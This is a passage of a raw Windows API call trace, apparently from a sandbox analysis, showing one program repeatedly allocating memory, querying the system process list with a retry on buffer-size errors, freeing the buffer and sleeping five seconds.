returned 0x0 [0211.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.741] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.828] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 